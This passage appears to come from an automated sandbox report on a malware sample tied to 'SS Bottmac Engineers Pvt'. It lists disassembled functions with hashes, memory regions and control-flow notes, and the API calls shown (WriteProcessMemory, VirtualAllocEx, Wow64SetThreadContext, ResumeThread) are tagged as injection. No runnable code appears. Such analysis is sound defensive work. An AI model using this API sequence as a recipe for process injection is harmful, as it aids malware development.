                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: d0c6f186532de7a60425876a6b46af99bc6881a59d27887e5d395e63904fa03c
                                • Instruction ID: 37540deed6f6d5c62f171c803693a009b5fa0d6fe4f456b2b4aeedd29e71fe6a
                                • Opcode Fuzzy Hash: d0c6f186532de7a60425876a6b46af99bc6881a59d27887e5d395e63904fa03c
                                • Instruction Fuzzy Hash: D02144B19003099FDF10CFAAC885BEEBBF5FF48314F10842AE919A7240C7789945CBA0
                                Function 0786D4F0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 648 786d4f0-786d53e 650 786d540-786d54c 648->650 651 786d54e-786d58d WriteProcessMemory 648->651 650->651 653 786d596-786d5c6 651->653 654 786d58f-786d595 651->654 654->653
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0786D580
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 30a49a66fb39d17fc86d87ac9c3958dd30514ca62e679b2a1a8f18b073f98861
                                • Instruction ID: fccc90eb583b6de8172cd2d9a14ff92c6476724a21dbb5498cb2eedfe38108e9
                                • Opcode Fuzzy Hash: 30a49a66fb39d17fc86d87ac9c3958dd30514ca62e679b2a1a8f18b073f98861
                                • Instruction Fuzzy Hash: 1E2136B19003599FCF10DFAAC885BEEBBF5FF48314F10842AE919A7240C7789944CBA0
                                Function 0786CF18 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 658 786cf18-786cf6b 661 786cf6d-786cf79 658->661 662 786cf7b-786cf7e 658->662 661->662 663 786cf85-786cfab Wow64SetThreadContext 662->663 664 786cfb4-786cfe4 663->664 665 786cfad-786cfb3 663->665 665->664
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0786CF9E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 365f169ff07bc5fc74cc6c67a9fb57ef663ad47b7773388662afbf58502e1538
                                • Instruction ID: 650eee6f8356c792fd21e1152e8543ac9b7fbb5557f87b156dc74a7e69ca5dea
                                • Opcode Fuzzy Hash: 365f169ff07bc5fc74cc6c67a9fb57ef663ad47b7773388662afbf58502e1538
                                • Instruction Fuzzy Hash: 3A214AB19002099FDB10DFAAC4857EEBBF4EF89324F14842AD559A7240C778A545CBA0
                                Function 0786D5D9 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 669 786d5d9-786d66d ReadProcessMemory 672 786d676-786d6a6 669->672 673 786d66f-786d675 669->673 673->672
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0786D660
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: b2bd55d6dfe354de97028776b4a869bbef575b4719fbbf72b551580e4becd989
                                • Instruction ID: 2fd437f59d597324feb82a12f362f1ccf7ae092a39ffc19110dbfd17874d0183
                                • Opcode Fuzzy Hash: b2bd55d6dfe354de97028776b4a869bbef575b4719fbbf72b551580e4becd989
                                • Instruction Fuzzy Hash: 792114B1D00249DFDB10DFAAC885AEEFBF5FF48310F10842AE519A7250C7789945DBA0
                                Function 017CD820 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017CD8AF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: c4ff3749ec7f279a46b5f8eb416d417f8a2d7e8fe7baf2c47023b73d9c26f478
                                • Instruction ID: ee1f67d519f99e1d359c41066950d055b8a8756337b1a77118c876d0c73b852e
                                • Opcode Fuzzy Hash: c4ff3749ec7f279a46b5f8eb416d417f8a2d7e8fe7baf2c47023b73d9c26f478
                                • Instruction Fuzzy Hash: 3B21D4B59003089FDB10CFAAD984ADEFBF8FB48710F14841AE918A7350D378A944CFA5
                                Function 0786D5E0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0786D660
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 7d75311396505dc1fb09f785a1e1af2b12bcfd583fadae3653d91483dc6852bc
                                • Instruction ID: f2f8fd59cc62998f1bca4ae8002c63c1e5d059f5d5bd7791b845168461ad14cd
                                • Opcode Fuzzy Hash: 7d75311396505dc1fb09f785a1e1af2b12bcfd583fadae3653d91483dc6852bc
                                • Instruction Fuzzy Hash: 982137B1D003499FCB10DFAAC884AEEFBF5FF48310F10842AE519A7240C7789945CBA1
                                Function 0786CF20 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0786CF9E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 495413c69f1eb6ced2ec8fd483eb52457dd17b39a4996736f8d677e6ba36bb2a
                                • Instruction ID: 1d87363506bb5d13e4913bef9676bc5d06f2625e66b68087a5422a813891e120
                                • Opcode Fuzzy Hash: 495413c69f1eb6ced2ec8fd483eb52457dd17b39a4996736f8d677e6ba36bb2a
                                • Instruction Fuzzy Hash: 4A2115B19003099FDB10DFAAC4857EEFBF5EF89314F14842AD559A7240CB78A945CFA1
                                Function 017CD828 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017CD8AF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 2080f277054d7c129f8234a45c25f6c5e09502d1b5976e0b98c74a2e8f032600
                                • Instruction ID: b59a5216815fd3a1e367c20037cf545dfebe16ec85c70d8bf4af4f8b2e2353c6
                                • Opcode Fuzzy Hash: 2080f277054d7c129f8234a45c25f6c5e09502d1b5976e0b98c74a2e8f032600
                                • Instruction Fuzzy Hash: 6C21B3B59002499FDB10CF9AD984ADEFFF9FB48710F14842AE918A7350D378A944CFA5
                                Function 0786D429 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0786D49E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: e1192d6e9e0e815daadaaeb48fb913b16570816e2cfac8aeb53a44fde6423aee
                                • Instruction ID: ef493157d60ca0bbc7ee8b0bb1db20d0ba9469f7a6640affc5535a4dc8180975
                                • Opcode Fuzzy Hash: e1192d6e9e0e815daadaaeb48fb913b16570816e2cfac8aeb53a44fde6423aee
                                • Instruction Fuzzy Hash: DB1147B19002099FDB10DFAAC845BEEFFF5EF58324F248419E919A7250C779A941CFA0
                                Function 0786D430 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0786D49E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 98e7219b3867987489b3ca80634a2d93e5da101759d9c189997cae7393b5ff00
                                • Instruction ID: d2a166e77a211d146a361e55b2567ce6c88792401a9293af4ae5aee05e5f91fa
                                • Opcode Fuzzy Hash: 98e7219b3867987489b3ca80634a2d93e5da101759d9c189997cae7393b5ff00
                                • Instruction Fuzzy Hash: D21137B19002499FCB10DFAAC844AEEFFF5EF88324F148419E519A7250C779A944CFA0
                                Function 0786CE68 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: e448216f7ebdc0708b8c5d91d539caca9cf260a169b4680673bb17e3091aa534
                                • Instruction ID: 9c3ea3f462a40971c6d9fb913a4af0989c5890f0e627528b5b1a81ac4caea359
                                • Opcode Fuzzy Hash: e448216f7ebdc0708b8c5d91d539caca9cf260a169b4680673bb17e3091aa534
                                • Instruction Fuzzy Hash: E3115BB5D002498FDB20DFAAC4447EEFBF5EF88314F20841AD519A7240C7796945CBA0
                                Function 0786CE70 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 080ec996dc908fb4ee627b87029cc93f5d2e17b97c108f454bbff18d256cd357
                                • Instruction ID: 36f39565fd9298e5f55360ed361234c201264256dcab0cf4807665dc98b8b9fc
                                • Opcode Fuzzy Hash: 080ec996dc908fb4ee627b87029cc93f5d2e17b97c108f454bbff18d256cd357
                                • Instruction Fuzzy Hash: 2F113AB5D003498FDB20DFAAC4457EEFBF5EF88314F24841AD559A7240CB79A945CBA0
                                Function 017CB538 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 017CB59E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: e6e37b085b6cd9a1d585d028fecb02c93b790c298c8b405f1c1fcbd52e41fb4f
                                • Instruction ID: 82e736424ba061c835989509cea29a95c322757b863b945556a6289095395aed
                                • Opcode Fuzzy Hash: e6e37b085b6cd9a1d585d028fecb02c93b790c298c8b405f1c1fcbd52e41fb4f
                                • Instruction Fuzzy Hash: A411DFB5C002498FDB20DF9AD444A9EFBF8AB88714F24842ED929A7610D379A545CFA1
                                Function 016CD4C4 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072078834.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_16cd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2115c7f8ec84298a53f13eacc4f387731d93ff16693f7303473704e557ab701a
                                • Instruction ID: f457abf8d1181f2dfeadf82b9d049d7c3c71066d84c60b570be29a4944d760fd
                                • Opcode Fuzzy Hash: 2115c7f8ec84298a53f13eacc4f387731d93ff16693f7303473704e557ab701a
                                • Instruction Fuzzy Hash: BA21E071500240DFDB05DF58D980B26BF65FB98718F60C57DE9090A256C33AD416CAE2
                                Function 016CD3D8 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072078834.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_16cd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 74bf27dca1df3c7245aa2c49b45b6356ec75920f7b8a21fb356b1545a6c1f163
                                • Instruction ID: 48a12e090aecc63518eb737d11ae57a6d2e00d34ed66b4eb5f50112610db38e8
                                • Opcode Fuzzy Hash: 74bf27dca1df3c7245aa2c49b45b6356ec75920f7b8a21fb356b1545a6c1f163
                                • Instruction Fuzzy Hash: 2C21E271500204DFDB05DF58D9C0B66BF65FB98714F20C57DDA094A256C33AE456C6E1
                                Function 016DD01C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072105926.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_16dd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4596b419fe66ffd22a4f00cb3bbb431c91b240fe8c6acad60604590b5103ff6b
                                • Instruction ID: 9c4ccea1598097332be853d1a62a049240601b143819ae51594e090b0380e598
                                • Opcode Fuzzy Hash: 4596b419fe66ffd22a4f00cb3bbb431c91b240fe8c6acad60604590b5103ff6b
                                • Instruction Fuzzy Hash: 0B210071A04200DFCB15EF68D980B26BF65EBC8314F20C569D90A4B396C33AD407CAA1
                                Function 016DD1D4 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072105926.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_16dd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 968e6188c7c1dccc899cb55f52f7b00d351fc199b2bda6b641becc0805eb9bde
                                • Instruction ID: b1b85701c8e606470d698acf01660273d0f2f72ee0aee2d43fc5666c3ed64808
                                • Opcode Fuzzy Hash: 968e6188c7c1dccc899cb55f52f7b00d351fc199b2bda6b641becc0805eb9bde
                                • Instruction Fuzzy Hash: 5D21F571944204EFDB05EFA8DDC0F26BB65FB84324F20C56DDA494B396C33AD406CA61
                                Function 016DD005 Relevance: .1, Instructions: 63COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072105926.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_16dd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be25f8a2123b6a5b1a30553740726ea63a324a9f2af065f1d9a578103d465169
                                • Instruction ID: f17bb0fa1e8774c0660c002a6b957d0eafd44e20914559917470e17ce56b9a23
                                • Opcode Fuzzy Hash: be25f8a2123b6a5b1a30553740726ea63a324a9f2af065f1d9a578103d465169
                                • Instruction Fuzzy Hash: 982192755083809FCB03DF64D994711BF71EB86214F28C5EAD8498F2A7C33A980ACB62
                                Function 016CD4BF Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072078834.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_16cd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction ID: 3355183b0a14e76f54be753fdba9ca384bc142b738136b0f8fd8d01870c7fb59
                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction Fuzzy Hash: EE11DF76404280CFCB02CF54D9C4B26BF71FB98714F24C6ADD9490B256C336D45ACBA2
                                Function 016CD3D3 Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072078834.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_16cd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction ID: ffef2ca458ab0f886a26a3be7b30087bc92164f41de1088bed4f20048b43b095
                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction Fuzzy Hash: 7811CD72404240DFDB02CF44D9C4B66BF61FB84224F24C6ADDA090A256C33AE45ACBA2
                                Function 016DD1CF Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072105926.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_16dd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction ID: f9ae3b6c2606c18dc08ba85fb92e50b5ad6c75836adabf9f724752965bac76e6
                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction Fuzzy Hash: 9C11BB75904280DFDB02DF54C9C4B15BFB1FB84224F24C6A9D9494B796C33AD40ACB62
                                Function 016CD745 Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072078834.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_16cd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 343660a7375757944ce5ef696ab3aa7b7017417f7f907f97e27b340834f36464
                                • Instruction ID: 03c2ee48e7d4b26e063864b2c989a26fcb460855f61aa6e44598d454da8e52f5
                                • Opcode Fuzzy Hash: 343660a7375757944ce5ef696ab3aa7b7017417f7f907f97e27b340834f36464
                                • Instruction Fuzzy Hash: F901A7710043849AE7219A99CD84B76BF9CEF45B24F18C53EED094A286D3799841CAF1
                                Function 016CD744 Relevance: .0, Instructions: 36COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072078834.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_16cd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1684053284cc54a93ba42ae646a85aa81091d6505d8cb5ba7960f9092994031e
                                • Instruction ID: e3066c8042bf4d208b58763e51e5f9c4e49b98232bddda00034b5d8f937c85e8
                                • Opcode Fuzzy Hash: 1684053284cc54a93ba42ae646a85aa81091d6505d8cb5ba7960f9092994031e
                                • Instruction Fuzzy Hash: E3F06271404384AAEB118E1ACC88B72FFA8EF45634F18C46AED484A386C3799844CBB1

                                Non-executed Functions

                                Function 078630D0 Relevance: .3, Instructions: 316COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 644abeea3732e6e7899bde89384e1645f4f89b1ff96e55a51d91869762a27b1f
                                • Instruction ID: f65fca8d7a03ca31700d558568b57e3c64847f6453f30e15dd2c235c6eeaed67
                                • Opcode Fuzzy Hash: 644abeea3732e6e7899bde89384e1645f4f89b1ff96e55a51d91869762a27b1f
                                • Instruction Fuzzy Hash: FBE1D6B4E001199FCB14CFA9C984AAEFBB2FF89305F24C169D415AB356D731A981CF61
                                Function 0786A730 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 19eeac08dc99d1c373b0111ecc44dd776096bea917f68eff9a5ba3ec4d28d209
                                • Instruction ID: 408caa30d92f9502733988e58b120d608acc53d61dbaeb9641e96c9a95ab3eb7
                                • Opcode Fuzzy Hash: 19eeac08dc99d1c373b0111ecc44dd776096bea917f68eff9a5ba3ec4d28d209
                                • Instruction Fuzzy Hash: 47E136B4E001199FDB14DFA9C580AAEBBB2FF89305F24C169D415AB356D730AD42CFA1
                                Function 0786C648 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 456a8dab62c3ea9179a183bac0809e489b1fecfb0ec18cbbe2295df06b3b8bc8
                                • Instruction ID: 04ef562f15b1aafb9681bee733998842f8f24ccd30b5a8fa528e75ea59a1ef0b
                                • Opcode Fuzzy Hash: 456a8dab62c3ea9179a183bac0809e489b1fecfb0ec18cbbe2295df06b3b8bc8
                                • Instruction Fuzzy Hash: B4E118B4E001199FDB14DFA9C584AAEBBB2FF89305F24C169D454AB356D730AD41CFA0
                                Function 0786AFA0 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 17a1ed3081b393d85a90740c531199ecd1b7b45e672bc0d217a459943f3762ab
                                • Instruction ID: cbf096bb67fdd67a372a3fa373f132fa78d2acd8243ac8d02a4c84a8ab3517c1
                                • Opcode Fuzzy Hash: 17a1ed3081b393d85a90740c531199ecd1b7b45e672bc0d217a459943f3762ab
                                • Instruction Fuzzy Hash: 0BE106F4E002199FDB14DFA9C584AAEBBB2FF89305F248169D414AB356D730A981CF60
                                Function 0786CFF8 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d0bcd6abfa4be184144871868485adc7229ee6fe010de750c3301e50969d76e5
                                • Instruction ID: 142e4fb4a2220d3dd8dbd2768ba833f67123d0ba632a2e460445195d47811f73
                                • Opcode Fuzzy Hash: d0bcd6abfa4be184144871868485adc7229ee6fe010de750c3301e50969d76e5
                                • Instruction Fuzzy Hash: 98E1F5B4E001199FDB14DFA9C5849AEBBB2FF89305F248169D414AB356D730AD81CFA0
                                Function 0786AB68 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1ee9a81b7747a959474e0f3beb099b955a01aac2c174b35faf8ae6e3ba0f8573
                                • Instruction ID: bb6f23156a5a3d0f9acb16bfa14b230b3f4b129c58865a89d596240aacbf86dd
                                • Opcode Fuzzy Hash: 1ee9a81b7747a959474e0f3beb099b955a01aac2c174b35faf8ae6e3ba0f8573
                                • Instruction Fuzzy Hash: D9E116B4E002199FDB14DFA9C5849AEBBB2FF89305F24C169E414AB356D730AD81CF61
                                Function 017CE134 Relevance: .3, Instructions: 264COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0be25166aba8637421145d17badaf9690cbe0e234899864b9e91220cc7254fe4
                                • Instruction ID: f9058f63a279739dd0a174f4c10f1254880c1953c1d0c893b83e02fa7aff9bdc
                                • Opcode Fuzzy Hash: 0be25166aba8637421145d17badaf9690cbe0e234899864b9e91220cc7254fe4
                                • Instruction Fuzzy Hash: 45A14A32A0021A8FCF15DFB9C8445DEFBB2FF89700B15856EE905AB265DB31E955CB80
                                Function 07863F88 Relevance: .2, Instructions: 169COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 717d99147ca56d2e85b01effea920609c4a43bcca98709cacedb3708f7dc1724
                                • Instruction ID: 26bd44f17b6ed7606d5328fc5810dc6aba1811d8da7d0bd6f2bbbf643435eb01
                                • Opcode Fuzzy Hash: 717d99147ca56d2e85b01effea920609c4a43bcca98709cacedb3708f7dc1724
                                • Instruction Fuzzy Hash: 1C7181B4E016599FCB04DFAAC9849DEFBF2BF89300F14D16AD419AB215DB349942CF50
                                Function 07863CF0 Relevance: .1, Instructions: 140COMMON
                                Download Yara Rule
